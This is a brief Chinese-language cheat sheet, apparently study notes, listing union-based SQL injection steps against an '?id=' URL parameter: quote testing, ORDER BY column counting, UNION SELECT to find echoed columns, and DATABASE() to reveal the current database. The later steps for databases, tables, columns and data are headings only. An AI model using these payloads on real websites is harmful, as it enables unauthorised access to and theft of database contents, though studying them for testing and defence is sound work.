CRUD

一些函数

注入

  1. 查看是否有注入:
    ?id=1'
  2. 查看有多少列:
    ?id=1' ORDER BY 10 --+
  3. 查看哪些数据可以回显:
    ?id=-1' UNION SELECT 1,2,3 --+
  4. 查看当前数据库:
    ?id=-1' UNION SELECT 1,2,DATABASE() --+
  5. 查看数据库:
  1. 查表
  1. 查列
  1. 查数据